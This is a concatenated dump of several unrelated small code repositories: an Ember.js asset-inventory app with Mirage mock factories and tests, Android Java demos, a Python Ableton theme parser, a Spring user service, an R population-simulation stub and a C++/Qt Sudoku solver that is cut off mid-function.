assetId() {
return faker.lorem.word();
},
category(i) {
return i % 2 === 0 ? 'Tool' : 'Equipment';
},
value() {
return Math.floor(Math.random() * 3000);
},
url(i) {
return `http://example.com/asset/${i}/`;
}
});
<file_sep>/mirage/factories/asset-location.js
import * as moment from 'moment';
import { Factory } from 'ember-cli-mirage';
export default Factory.extend({
whenSeen() {
let now = moment.utc();
let days = Math.floor(Math.random() * (25 - 1 + 1) + 1);
let hours = Math.floor(Math.random() * (23 + 1));
let minutes = Math.floor(Math.random() * (59 + 1));
now.subtract(minutes, 'minutes');
now.subtract(hours, 'hours');
now.subtract(days, 'days');
return now.format()
},
afterCreate(assetLocation, server) {
let toUpdate = {};
if (!assetLocation.asset) {
toUpdate.asset = server.create('asset');
}
if (!assetLocation.location) {
toUpdate.location = server.create('place');
}
if (!assetLocation.assignedTo) {
toUpdate.assignedTo = server.create('place');
}
if (!assetLocation.seenBy) {
toUpdate.seenBy = server.create('place');
}
assetLocation.update(toUpdate);
}
});
<file_sep>/app/models/asset-location-summary.js
import { computed } from '@ember/object';
import DS from 'ember-data';
const { Model, attr, belongsTo } = DS;
export default class AssetLocationSummary extends Model{
@belongsTo('place') location;
@attr('number') assets;
@attr('number') assignedAssets;
@attr('number') assetValue;
@attr('number') assignedAssetValue;
@computed('assignedAssets')
get nonAssignedAssets() {
return this.get('assets') - this.get('assignedAssets');
}
@computed('assignedAssetValue')
get nonAssignedAssetValue() {
return this.get('assetValue') - this.get('assignedAssetValue');
}
}
<file_sep>/app/models/asset-location.js
import DS from 'ember-data';
const { Model, attr, belongsTo } = DS;
export default class AssetLocation extends Model{
@belongsTo('asset') asset;
@belongsTo('place', { inverse: null }) location;
@belongsTo('place', { inverse: null }) assignedTo;
@belongsTo('place', { inverse: null }) seenBy;
@attr('string') whenSeen;
}
<file_sep>/app/serializers/place.js
import ApplicationSerializer from './application';
export default class PlaceSerializer extends ApplicationSerializer {
}
<file_sep>/app/helpers/semantic-date.js
import { helper } from '@ember/component/helper';
import { htmlSafe } from '@ember/string';
import * as moment from 'moment-timezone';
export default helper(function semanticDate([value], {fmt='h:mma MM/DD', tz=null}) {
var formattedDate = tz === null ? moment.utc(value).format(fmt) : moment.utc(value).tz(tz).format(fmt);
return htmlSafe(`<time datetime="${value}">${formattedDate}</time>`)
});
<file_sep>/app/components/asset-location-summaries/locations.js
import Component from '@ember/component';
export default class Locations extends Component {
}
<file_sep>/mirage/factories/place.js
import { Factory } from 'ember-cli-mirage';
import faker from 'faker';
let levelToIcon = {
0: 'icon-organization',
1: 'icon-yard',
2: [
'icon-bkt-truck',
'icon-crew',
'icon-room',
'icon-foreman-truck',
'icon-heavy-foreman-truck',
'icon-line-truck',
'icon-sqt-truck',
'icon-pump-truck',
],
3: [
'icon-bkt-truck',
'icon-foreman-truck',
'icon-heavy-foreman-truck',
'icon-line-truck',
'icon-sqt-truck',
'icon-pump-truck',
]
}
export default Factory.extend({
name() {
return faker.address.city();
},
level() {
// Level 1-3
return Math.floor(Math.random() * 2 + 1);
},
lft(i) {
return i;
},
url(i) {
return `http://example.com/place/${i}/`;
},
icon() {
let icons = levelToIcon[this.level];
if (typeof icons === 'string' ) {
return icons;
} else {
return icons[Math.floor(Math.random() * icons.length)]
}
}
});
<file_sep>/app/helpers/humanize-date.js
import { helper } from '@ember/component/helper';
import * as moment from 'moment-timezone';
export default helper(function humanizeDate([value]) {
return moment.utc(value).fromNow();
});
<file_sep>/app/utils/filter-utils.js
export function parseTimeTerm(term) {
let parts = term.split(/\s+/, 1);
// parseInt will extract out number from strings like '32something something'
let parsedInt = parseInt(parts[0]);
let intPart = Number.isInteger(parsedInt) ? parsedInt : null
let theRest = term.replace(intPart, '');
return [intPart, theRest]
}
export function joinTimeParts(int, timePart) {
return `${int} ${timePart.trim()}`;
}
<file_sep>/mirage/scenarios/default.js
export default function(server) {
/*
Seed your development database using your factories.
This data will not be loaded in your tests.
*/
server.createList('place', 35);
// server.createList('asset', 5);
server.createList('assetLocationSummary', 8).forEach(summary => {
server.createList('assetLocation', 15, { location: summary.location });
});
}
<file_sep>/app/constants.js
// Options to pass to last-seen-filter component
export const VISION_VALUES = ['Seen', 'Not Seen'];
export const TIME_TYPES = ['hours', 'days'];
// Utility parseWhenSeen returns array of values.
export const VISION_I = 0;
export const TIME_VALUE_I = 1;
export const TIME_TYPE_I = 2;
export const WHEN_SEEN_SEP = '-';
export const QUERY_LOOKUP_SEP = '__';
<file_sep>/app/components/asset-location-summaries.js
import Component from '@ember/component';
import { readOnly, notEmpty, mapBy, sum } from '@ember/object/computed';
import { action, computed } from '@ember/object';
export default class AssetLocationSummaries extends Component {
@readOnly('summariesTask.value') summaries;
@readOnly('summariesTask.isRunning') isSummariesLoading;
assetLocationsTask = null;
selectedLocation = null;
@readOnly('assetLocationsTask.isRunning') isAssetLocationsLoading;
@readOnly('assetLocationsTask.value') assetLocations;
@notEmpty('assetLocations') showAssetLocations;
@mapBy('assetLocations', 'asset') locationAssets;
@mapBy('locationAssets', 'value') assetValues;
@sum('assetValues') totalAssetValue;
/***** Getters ******/
@computed('summaries.[]')
get summariesAsRows() {
// Something about Ember-Data's RecordArray stuff throws Ember Table off...
return this.summaries.toArray();
}
@computed('locationAssets.[]')
get totalTools() {
return this.locationAssets.reduce((total, asset) => {
return total + (asset.get('isTool') ? 1 : 0);
}, 0)
}
@computed('locationAssets.[]')
get totalEquipment() {
return this.locationAssets.reduce((total, asset) => {
return total + (asset.get('isEquipment') ? 1 : 0);
}, 0)
}
/***** Actions ******/
@action
viewAssetLocations(forLocation) {
this.set('assetLocationsTask', this.get('fetchAssetLocations')(forLocation));
this.set('selectedLocation', forLocation);
}
@action
stopViewingAssetLocations() {
this.set('assetLocationsTask', null);
this.set('selectedLocation', null);
}
}
<file_sep>/app/controllers/index.js
import Controller from '@ember/controller';
import { action } from '@ember/object';
import { task } from 'ember-concurrency';
import { normalizeAssetLocationParams } from 'inventory/utils/query-params';
export default class Index extends Controller{
/***** Tasks ******/
@task(function * (forLocation) {
// query = Object.assign(query, {location: forLocation.get('id')});
// return yield this.store.query('asset-location', query);
return yield this.store.findAll('asset-location');
}).restartable() fetchAssetLocationsTask;
/***** Actions ******/
@action
fetchAssetLocations(forLocation) {
return this.fetchAssetLocationsTask.perform(forLocation);
}
}
<file_sep>/app/serializers/asset-location.js
import DS from "ember-data";
import ApplicationSerializer from './application';
const { EmbeddedRecordsMixin } = DS;
export default class AssetLocationSerializer extends ApplicationSerializer.extend(EmbeddedRecordsMixin) {
attrs = {
asset: { embedded: 'always' },
assignedTo: { embedded: 'always' },
location: { embedded: 'always' },
seenBy: { embedded: 'always' },
}
}
<file_sep>/app/components/asset-location-summaries/summaries-table.js
import Component from '@ember/component';
export default class SummariesTable extends Component {
classNames = ['summaries-table'];
summaryColumns = [
{name: 'Location', slug: 'location'},
{name: 'Inventory', slug: 'inventory'},
{name: 'Non-Assigned Inventory', slug: 'non-assigned'},
{name: '', slug: 'actions'},
];
didInsertElement() {
// EmberTable doesn't have any way to access the <table></table> element itself so we resort to
// this in order to hook it up to Bootstrap's CSS.
this.element.querySelector('table').classList.add('table', 'table-condensed');
}
}
<file_sep>/mirage/factories/asset-location-summary.js
import { Factory } from 'ember-cli-mirage';
export default Factory.extend({
summary: 'thing',
assets() {
return Math.floor(Math.random() * 30);
},
assignedAssets() {
return Math.floor(Math.random() * this.assets);
},
assetValue() {
return Math.floor(Math.random() * 300000);
},
assignedAssetValue() {
return Math.floor(Math.random() * this.assetValue);
},
afterCreate(assetLocation, server) {
assetLocation.update({location: server.create('place')});
}
});
<file_sep>/mirage/serializers/asset-location.js
import ApplicationSerializer from './application';
export default ApplicationSerializer.extend({
include: ['location', 'asset', 'assignedTo', 'seenBy'],
});
<file_sep>/app/models/asset.js
import DS from 'ember-data';
import { match } from '@ember/object/computed';
const { Model, attr } = DS;
export default class Asset extends Model{
@attr('string') name;
@attr('string') assetType;
@attr('string') assetId;
@attr('string') category;
@attr('number') value;
// Url to this asset's detail page
@attr('string') url;
@match('category', /Equipment/) isEquipment;
@match('category', /Tool/) isTool;
}
<file_sep>/tests/unit/controllers/index-test.js
import { module, test } from 'qunit';
import { setupTest } from 'ember-qunit';
module('Unit | Controller | index', function(hooks) {
setupTest(hooks);
test('updates timeValue on timeValueChanged action', function(assert) {
let controller = this.owner.lookup('controller:index');
assert.strictEqual(controller.get('timeValue'), null)
controller.send('timeValueChanged', 100);
assert.strictEqual(controller.get('timeValue'), 100)
});
test('updates timeType on timeTypeChanged action', function(assert) {
let controller = this.owner.lookup('controller:index');
assert.strictEqual(controller.get('timeType'), null)
controller.send('timeTypeChanged', 'days');
assert.strictEqual(controller.get('timeType'), 'days')
});
test('updates visionValue on visionValueChanged action', function(assert) {
let controller = this.owner.lookup('controller:index');
assert.strictEqual(controller.get('visionValue'), null)
controller.send('visionValueChanged', 'Seen');
assert.strictEqual(controller.get('visionValue'), 'Seen')
});
});
<file_sep>/tests/unit/utils/filter-utils-test.js
import { module, test } from 'qunit';
import { parseTimeTerm, joinTimeParts } from 'inventory/utils/filter-utils';
module('Unit | Utility | filter-utils | parseTimeTerm', function() {
test('correctly parses apart the term', function(assert) {
let [int, theRest] = parseTimeTerm('23thingie');
assert.strictEqual(int, 23);
assert.strictEqual(theRest, 'thingie');
});
test('correctly parses apart slightly more complicated term', function(assert) {
let [int, theRest] = parseTimeTerm('23 and a one and a two');
assert.strictEqual(int, 23);
assert.strictEqual(theRest, ' and a one and a two');
});
test('correctly handles term not beginning with a number', function(assert) {
let [int, theRest] = parseTimeTerm('a term');
assert.strictEqual(int, null);
assert.strictEqual(theRest, 'a term');
});
test('correctly handles term not having anything else but a number', function(assert) {
let [int, theRest] = parseTimeTerm('32');
assert.strictEqual(int, 32);
assert.strictEqual(theRest, '');
});
test('returns empty values when given an empty string', function(assert) {
let [int, theRest] = parseTimeTerm('');
assert.strictEqual(int, null);
assert.strictEqual(theRest, '');
});
});
module('Unit | Utility | filter-utils | joinTimeParts', function() {
test('correctly joins together the given data', function(assert) {
assert.strictEqual(joinTimeParts(55, 'thingy thing'), '55 thingy thing');
});
test('handles the string part with extra white spaces', function(assert) {
assert.strictEqual(joinTimeParts(55, ' thingy thing '), '55 thingy thing');
});
});
<file_sep>/tests/integration/helpers/humanize-date-test.js
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import hbs from 'htmlbars-inline-precompile';
import * as moment from 'moment-timezone';
module('Integration | Helper | humanize-date', function(hooks) {
setupRenderingTest(hooks);
let dt = '2019-12-07T10:05:00Z';
hooks.beforeEach(function() {
this.set('dtStr', dt);
})
test('it renders properly', async function(assert) {
await render(hbs`{{humanize-date dtStr}}`);
assert.equal(this.element.textContent.trim(), moment.utc(dt).fromNow());
});
});
<file_sep>/app/helpers/format-currency.js
import { helper } from '@ember/component/helper';
import { isNone, isEmpty } from '@ember/utils';
const SIGN = '$';
export default helper(function formatCurrency([value]) {
if (isNone(value)) {
return '';
}
if (value > 999) {
let asStr = value.toString();
let reversed = asStr.split('').reverse().join('');
// Regex includes matches but we gotta filter out empty strings from split
let justDigitsAsStr = reversed.split(/(\d{3})/).filter(part => !isEmpty(part));
value = justDigitsAsStr.join(',').split('').reverse().join('');
}
return `${SIGN}${value}`;
});
<file_sep>/tests/integration/components/last-seen-filter-test.js
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render, click } from '@ember/test-helpers';
import hbs from 'htmlbars-inline-precompile';
import { typeInSearch } from 'ember-power-select/test-support/helpers';
import { clickTrigger } from '../../helpers/eps-helper-overrides';
import { joinTimeParts } from 'inventory/utils/filter-utils';
import { visionOptions, timeTypes } from './constants';
module('Integration | Component | last-seen-filter', function(hooks) {
setupRenderingTest(hooks);
let timeTypeSelectTrigger = '.time-type-select';
let timeTypeSelectDropdown = '.time-type-select-dropdown';
let visionSelectTrigger = '.vision-select';
// let visionSelectDropdown = '.vision-select-dropdown';
let noTimeTypeMsg = 'Enter a number followed by \'hours\' or \'days\'';
test('renders with values', async function(assert) {
assert.expect(2);
this.visionOptions = visionOptions;
this.timeTypes = timeTypes;
this.visionValue = this.visionOptions[0];
this.timeType = this.timeTypes[0];
this.timeValue = 32;
await render(hbs`
<LastSeenFilter
@visionOptions={{visionOptions}}
@timeTypes={{timeTypes}}
@visionValue={{visionValue}}
@timeValue={{timeValue}}
@timeType={{timeType}}
@onTimeValueChanged={{action (mut timeValue)}}
@onTimeTypeChanged={{action (mut timeType)}}
@onVisionChanged={{action (mut visionValue)}}/>
`);
assert.dom(visionSelectTrigger).includesText(this.visionValue);
assert.dom(timeTypeSelectTrigger).includesText(joinTimeParts(this.timeValue, this.timeType));
});
test('only allows selection of time type once user enters first a number', async function(assert) {
assert.expect(5);
this.timeTypes = timeTypes;
await render(hbs`
<LastSeenFilter
@timeTypes={{timeTypes}}
@timeValue={{timeValue}}
@timeType={{timeType}}
@onTimeValueChanged={{action (mut timeValue)}}
@onTimeTypeChanged={{action (mut timeType)}}
@onVisionChanged={{action (mut visionValue)}}/>
`);
let optionsSelector = `${timeTypeSelectDropdown} .ember-power-select-option`;
await clickTrigger(timeTypeSelectTrigger);
assert.dom(optionsSelector).includesText(noTimeTypeMsg);
await typeInSearch(timeTypeSelectTrigger, 'ello');
assert.dom(optionsSelector).includesText(noTimeTypeMsg);
await typeInSearch(timeTypeSelectTrigger, 10);
assert.dom(optionsSelector).doesNotIncludeText(noTimeTypeMsg);
assert.dom(`${optionsSelector}:nth-child(1)`).includesText(this.timeTypes[0]);
assert.dom(`${optionsSelector}:nth-child(2)`).includesText(this.timeTypes[1]);
});
test('user is not allowed to select more than one thing', async function(assert) {
assert.expect(1);
this.timeTypes = timeTypes;
await render(hbs`
<LastSeenFilter
@timeTypes={{timeTypes}}
@timeValue={{timeValue}}
@timeType={{timeType}}
@onTimeValueChanged={{action (mut timeValue)}}
@onTimeTypeChanged={{action (mut timeType)}}
@onVisionChanged={{action (mut visionValue)}}/>
`);
await clickTrigger(timeTypeSelectTrigger);
await typeInSearch(timeTypeSelectTrigger, 5);
let optionsSelector = `${timeTypeSelectDropdown} .ember-power-select-option`;
await click(`${optionsSelector}:nth-child(1)`);
let optionSelector = `${timeTypeSelectTrigger} .ember-power-select-multiple-option`;
assert.dom(optionSelector).includesText('5 days');
});
});
|
8a0d5c39ffa48f68a2bd3e708360705f079a5561
|
[
"JavaScript"
] | 28 |
JavaScript
|
Subaku/mirage-issue
|
934670b1470ca8e3605a1712f8f8f76c759da341
|
22a607a3179b37c677bd3d325ed8ca5d8d565de6
|
refs/heads/main
|
<file_sep># WSMobileAplication
Nama : <NAME>
Nim : E41200378 /A
Pengumpulan tugas workshop mobile Minggu 4
1. Output dari ListView

2. Output Spinner dan Auto Complete Text

3. Widget RecycleView

(Minggu 5 Fragment)
Nama : <NAME>, Nim : E41200378 / A



(Minggu 6 Intent)
1.Intent Explicit

2. Intent Implicit dan hasil run ketika di hubungkan dengan instagram


(Tugas Minggu 7 Manajemen file dan SQLite)


<file_sep>package com.example.impintent;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
public class SecondActivity extends AppCompatActivity {
TextView tvnama,tvnim; // sebagai penampung data dari main activity
Button btnweb; // mendeklarasikan button untuk menuju link
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_second);
tvnama =findViewById(R.id.tv_nama); //membuat variable yg di buat berisi id dari textview
tvnim = findViewById(R.id.tv_nim);
//explicit intent
Intent terima = getIntent();//mendapatkan data intent/ data yang di kirim
String terimanama = terima.getStringExtra("kirimnama"); // mendapatkan data yang di kirim oleh activity main
String terimanim = terima.getStringExtra("kirimnim");
//implicit intent
tvnama.setText(terimanama);//menampilkan data yang di terima ke variable yg di buat
tvnim.setText(terimanim);
btnweb = findViewById(R.id.goto_link);//membuat variable button berisi id button
btnweb.setOnClickListener(new View.OnClickListener() { // memberi action pada button
@Override
public void onClick(View view) {
String url = "https://www.instagram.com/buildwithangga/"; // mengambil data dari edit text link dan di simpan ke variable string
Intent bukawebsite = new Intent(Intent.ACTION_VIEW); // membuat objek intent
bukawebsite.setData(Uri.parse(url));//melakukan parsing alamat website yg disimpan di variable string agar di kenali oleh android
startActivity(bukawebsite);// kode untuk memulai intent
}
});
}
}<file_sep>package com.example.recycleviewdatamovies;
import android.content.Intent;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.recyclerview.widget.RecyclerView;
import java.util.ArrayList;
public class MoviesRecycleViewAdapter extends RecyclerView.Adapter<MoviesRecycleViewAdapter.MovieViewHolder> {
ArrayList<Movies> arrayListMovies;
public MoviesRecycleViewAdapter(ArrayList<Movies> arrayListMovies){
this.arrayListMovies= arrayListMovies;
}
@NonNull
@Override
public MoviesRecycleViewAdapter.MovieViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
//mengambil data/layout dari item.xml
View view = LayoutInflater.from(parent.getContext()).inflate(R.layout.item,parent,false);
return new MovieViewHolder(view);
}
@Override
public void onBindViewHolder(@NonNull MoviesRecycleViewAdapter.MovieViewHolder holder, int position) {
//membuat sebuah konstanta
final Movies movies = arrayListMovies.get(position);//untuk mendapatkan index dari data yang ada pada array list.
holder.imageView.setImageResource(movies.getImage());
holder.textViewTitle.setText(movies.getTitle());
holder.textViewRating.setText(String.valueOf(movies.getRating()));
holder.textViewReleaseDate.setText(movies.getReleasedate());
//membuat action yang ketika di clik maka akan mengeluarkan deskripsinya
holder.itemView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
// fungsinya melempar nilai menggunakan inten agar dapat ditangkap oleh detail movie
Intent intent = new Intent(holder.itemView.getContext(), DetailMovieActivity.class);
intent.putExtra("Movies",movies);
//akan menjalankan perpindahan activity dari main activity ke detail movie activity
holder.itemView.getContext().startActivity(intent);
}
});
}
@Override
public int getItemCount() {
//untuk mendapatkan jumlah data perlu menerapkan fungsi di bawah ini.
return arrayListMovies.size();
}
//class movie view adalah class turunan dari class recycleview
public class MovieViewHolder extends RecyclerView.ViewHolder {
TextView textViewTitle, textViewRating, textViewReleaseDate;
ImageView imageView;
public MovieViewHolder(@NonNull View itemView) {
super(itemView);
//mendeskripsikan textview dengan memanggil id dari textview
textViewTitle = itemView.findViewById(R.id.tvTitle);
textViewRating = itemView.findViewById(R.id.tvRating);
textViewReleaseDate = itemView.findViewById(R.id.tvReleaseDate);
imageView = itemView.findViewById(R.id.image);
}
}
}
<file_sep>package com.example.recycleviewdatamovies;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import android.os.Bundle;
import java.util.ArrayList;
public class MainActivity extends AppCompatActivity {
RecyclerView recyclerView;
MoviesRecycleViewAdapter adapter;
ArrayList<Movies> objMovies = new ArrayList<>();
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
recyclerView = findViewById(R.id.recycleView);
objMovies.add(new Movies("The Suicide Squad","Action, Adventure, Comedy", "<NAME>",7.3 ,"Supervillains <NAME>, Bloodsport, Peacemaker and a collection of nutty cons at Belle Reve prison join the super-secret, super-shady Task Force X as they are dropped off at the remote, enemy-infused island of Corto Maltese." , "6 Agustus 2021" , R.mipmap.ic_launcher));
objMovies.add(new Movies("<NAME>","Action, Adventure","Cate Shortland" , 6.8 ,"<NAME> confronts the darker parts of her ledger when a dangerous conspiracy with ties to her past arises." ,"8 July 2014",R.drawable.blackwdw));
objMovies.add(new Movies("Jumanji" , "Action, Adventure, Comedy", "<NAME>" , 6.9 , "Four teenagers are sucked into a magical video game, and the only way they can escape is to work together to finish the game." ,"4 December 2019." , R.drawable.jumanji));
adapter = new MoviesRecycleViewAdapter(objMovies);
recyclerView.setAdapter(adapter);
recyclerView.setLayoutManager(new LinearLayoutManager(MainActivity.this));
}
}
|
66fe4a44f2cd9f3baf918da90a7340db25e93509
|
[
"Markdown",
"Java"
] | 4 |
Markdown
|
pujirahayu01/WSMobileAplication
|
8125138601c2298acac84cb820d51c2cb35731a4
|
ec1b10d71180d659f3f06cca7881f933810086bd
|
refs/heads/master
|
<repo_name>wanglaozhe/springdata<file_sep>/src/main/java/com/ww/service/UserService.java
package com.ww.service;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import org.springframework.transaction.annotation.Transactional;
import com.ww.entity.Auth;
import com.ww.repository.AuthDao;
//Spring Bean的标识.
@Component
//类中所有public函数都纳入事务管理的标识.
@Transactional
public class UserService {
@Autowired
private AuthDao userDao;
/**
* 保存用户
* @param user
*/
public void saveUser(Auth user){
userDao.save(user);
}
public List<Auth> findAll(){
return (List<Auth>) userDao.findAll();
}
public List<Auth> findUserByUsername(String username){
return userDao.findByUsername(username);
}
public Auth findUserById(long id){
return this.userDao.findById(id);
}
}
|
896e81f0eaad80f68d61940f667d584f6854aa1f
|
[
"Java"
] | 1 |
Java
|
wanglaozhe/springdata
|
8b3b3c9e7299d9b765f588ccc02304ec06672cff
|
d9e83d6c395af3b9138b1af420e507bfcaeeb8be
|
refs/heads/master
|
<repo_name>cwsjitu/secrSimulation<file_sep>/secrCode.R
##set your working directory with
# setwd()
library(secr)
library(raster)
library(rgdal)
library(sp)
library(maptools)
library(rgeos)
library(dplyr)
## coordinate system
latlong = "+init=epsg:4326" ## LatLon Projection
ingrid = "+init=epsg:32643" ## UTM Projection
## assumptions to generate capture history
N <- ## Number of individuals/activity centers
traploc <- ## Number of trap locations
g0 <- ## value between 0.1 and 0.3
sigma <- ## depends on home range of species
occasions <- 10 ## 10 sampling occasions
<file_sep>/README.md
# secrSimulation
PopEstimationCourse
|
efa7bcef12dfe372bfd199bc7d7a87251efe5d2b
|
[
"Markdown",
"R"
] | 2 |
R
|
cwsjitu/secrSimulation
|
62bbb7cfac9e061b68c2c518f93ae50d442410c3
|
766f99b7f5f8bc849d26550108cd26fcdff55303
|
refs/heads/master
|
<file_sep># PurposefulPhp
Familiar, high level programming.
<file_sep><?php
declare(strict_types=1);
namespace \StillDreaming1\PurposefulPhp;
final class Contractor
{
}
|
1645f2924ec0ddaee6a53ff7c77cd26024540a5b
|
[
"Markdown",
"PHP"
] | 2 |
Markdown
|
gitter-badger/PurposefulPhp
|
d89658ee9116b77a95b0bc41ffac2a9f54c6561d
|
f936aa94b4043c8649211776536c9cb597513fee
|
refs/heads/main
|
<file_sep># Live 10 Theme File Parser by h1data
# outputs tsv file with color tag and color codes
# confirmed functional with Python 3.7.1
# usage
# python liveThemeParser.py [livethemefile]
import sys
import os
import xml.etree.ElementTree as ET
if len(sys.argv) != 2:
print("usage: python " + sys.argv[0] + " [liveThemeFile]")
sys.exit()
try:
outfile = os.path.splitext(os.path.basename(sys.argv[1]))[0] + "_result.txt"
root = ET.parse(sys.argv[1])
with open(outfile, "w") as f:
for element in root.findall("./SkinManager//R/.."):
R = int(element.find("./R").get("Value"))
G = int(element.find("./G").get("Value"))
B = int(element.find("./B").get("Value"))
f.write(element.tag + "\t" + ("%x" % R).zfill(2) + ("%x" % G).zfill(2) + ("%x" % B).zfill(2) + "\n")
f.closed
print("output to " + outfile)
except FileNotFoundError:
print("!!ERROR!! unable to read " + sys.argv[1])
<file_sep>## Live 10 Theme File Parser
Simple Python script to parse Live 10 theme file (*.ask) and output tsv file.<br>
Confirmed operational with Python 3.7.1<br>
### Usage
$ python liveThemeParser.py [live theme file]
### ...so what is this for?
Once used to analyze the relation of Live theme colors and live.* objects in Max.<br>
Not for migration to Live 11 but hope this helps someone.
|
476d54e43ec900c911f5cd29117345201caedddd
|
[
"Markdown",
"Python"
] | 2 |
Python
|
h1data/liveThemeParser.py
|
2f9747b3ab777859fe11384940e6ef2e20571140
|
150757fa120843ac60acda83bc65c4b45ed21ebc
|
refs/heads/master
|
<repo_name>dakesson/SudokuSolver<file_sep>/SudokuSolverGUI/Position.cpp
#include <math.h>
#include "Position.h"
Position::Position(int row, int col)
{
this->storagePos = row * NUM_COL + col;
}
Position::Position(int storagePos)
{
this->storagePos = storagePos;
}
int Position::getRow()
{
return (storagePos / NUM_ROW);
}
int Position::getCol()
{
return (storagePos % NUM_ROW);
}
int Position::getStoragePos()
{
return storagePos;
}
int Position::getBox()
{
return floor(getRow() / 3) * 3 + floor(getCol() / 3);
}
Position::~Position()
{
}<file_sep>/README.md
# SudokuSolver
- Solves sudoku through depth first search with backtrack
- Verifies that only one solution is found
- Does a very rough estimation of degree of difficulty by counting the number of backtracks performed
- Generates new very easy sudokus though depth first search
- Simple UI written in QT
<file_sep>/SudokuSolverGUI/SudokuWindow.h
#pragma once
#include <QtWidgets>
#include "Sudoku.h"
class SudokuWindow : public QMainWindow
{
private:
Sudoku *sudoku;
QMenu *fileMenu;
QGridLayout *layout;
QVector<QLabel*> cellLabels;
const int cellSize = 40;
bool sudokuLoaded = false;
void createMenu();
void drawBoxBorders();
void drawCellLabels();
QLabel* getCellLabel(int row, int col);
public:
SudokuWindow();
void draw(Sudoku *sudoku);
void open();
void solve();
void generate();
~SudokuWindow();
};<file_sep>/SudokuSolverGUI/SudokuWindow.cpp
#include "SudokuWindow.h"
#include "Parser.h"
#include "SudokuGenerator.h"
#include "SudokuSolver.h"
SudokuWindow::SudokuWindow()
{
layout = new QGridLayout;
drawCellLabels();
drawBoxBorders();
createMenu();
QWidget * central = new QWidget();
setCentralWidget(central);
centralWidget()->setLayout(layout);
setWindowTitle("Sudoku");
setFixedSize(cellSize * NUM_COL + 15, cellSize * NUM_ROW + 30 + 10);
centralWidget()->setContentsMargins(0, 0, 10, 10);
}
void SudokuWindow::createMenu()
{
QMenuBar* menuBar = new QMenuBar();
QMenu *fileMenu = new QMenu("File");
menuBar->addMenu(fileMenu);
QAction *openAction = fileMenu->addAction("Open");
connect(openAction, &QAction::triggered, this, &SudokuWindow::open);
QAction *solveAction = fileMenu->addAction("Solve");
connect(solveAction, &QAction::triggered, this, &SudokuWindow::solve);
QAction *generateAction = fileMenu->addAction("Generate");
connect(generateAction, &QAction::triggered, this, &SudokuWindow::generate);
layout->setMenuBar(menuBar);
}
void SudokuWindow::drawBoxBorders()
{
for (int row = 0; row < 3; ++row) {
for (int col = 0; col < 3; col++) {
QLabel * const cellSquare = new QLabel();
cellSquare->setFixedSize(cellSize * 3, cellSize * 3);
layout->addWidget(cellSquare, row * 3, col * 3);
cellSquare->setStyleSheet("border: 2px solid black");
}
}
}
void SudokuWindow::drawCellLabels()
{
for (int row = 0; row < NUM_ROW; ++row) {
for (int col = 0; col < NUM_COL; col++) {
QLabel * const cellLabel = new QLabel();
cellLabel->setFixedSize(cellSize, cellSize);
layout->addWidget(cellLabel, row, col);
cellLabel->setStyleSheet("border: 1px solid grey");
cellLabel->setAlignment(Qt::AlignCenter);
cellLabels.append(cellLabel);
}
}
}
QLabel * SudokuWindow::getCellLabel(int row, int col)
{
return cellLabels[row * NUM_COL + col];
}
void SudokuWindow::draw(Sudoku *sudoku)
{
this->sudoku = sudoku;
sudokuLoaded = true;
for (int row = 0; row < NUM_ROW; row++) {
for (int col = 0; col < NUM_COL; col++) {
int value = sudoku->getValueFor(Position(row, col));
if (value) {
char asciiNumber = '0' + value;
QString cellString = QString(asciiNumber);
getCellLabel(row, col)->setText(cellString);
}
else {
getCellLabel(row, col)->setText(QString(""));
}
}
}
}
void SudokuWindow::open()
{
QString filename = QFileDialog::getOpenFileName();
QFile file(filename);
if (!file.open(QIODevice::ReadOnly | QIODevice::Text))
return;
Sudoku *sudoku = Parser::parseFile(filename.toStdString());
if (!sudoku->allConstraintsOK()) {
QMessageBox::warning(this, "Sudoku",
"This sudoku has contradicting constraints");
}
draw(sudoku);
}
void SudokuWindow::solve()
{
if (!sudokuLoaded)
return;
SudokuSolver *solver = new SudokuSolver(sudoku);
solver->findAllSolutions();
if (solver->solutions.size() == 1) {
QMessageBox::information(this, "Solved!",
QString::fromStdString(solver->difficultyOfSudoku()));
draw(&solver->solutions[0]);
} else {
QMessageBox::information(this, "Sudoku",
"This sudoku does not have a unique solution");
}
}
void SudokuWindow::generate()
{
Sudoku *sudoku = SudokuGenerator().generate();
draw(sudoku);
}
SudokuWindow::~SudokuWindow()
{
}<file_sep>/SudokuSolverGUI/Sudoku.cpp
#include "Sudoku.h"
#include "Utility.h"
Sudoku::Sudoku()
{
this->storage = std::vector<int>(NUM_ROW * NUM_COL);
}
void Sudoku::setValue(int value, Position pos)
{
storage[pos.getStoragePos()] = value;
}
void Sudoku::removeValue(Position pos)
{
setValue(NULL, pos);
}
int Sudoku::getValueFor(Position pos)
{
return storage[pos.getStoragePos()];
}
std::vector<int>Sudoku::getRowValues(int row)
{
std::vector<int> rowValues;
for (int col = 0; col < NUM_COL; col++)
{
int value = getValueFor(Position(row,col));
if (value)
rowValues.push_back(value);
}
return rowValues;
}
std::vector<int> Sudoku::getColValues(int col)
{
std::vector<int> colValues;
for (int row = 0; row < NUM_ROW; row++)
{
int value = getValueFor(Position(row, col));
if (value)
colValues.push_back(value);
}
return colValues;
}
std::vector<int> Sudoku::getBoxValues(int number)
{
std::vector<int> BoxValues;
int startRow = floor(number / 3) * 3;
for (int row = startRow; row < startRow + 3; row++)
{
int startCol = (number % 3) * 3;
for (int col = startCol; col < startCol + 3; col++)
{
int value = getValueFor(Position(row, col));
if (value)
BoxValues.push_back(value);
}
}
return BoxValues;
}
bool Sudoku::allConstraintsOK()
{
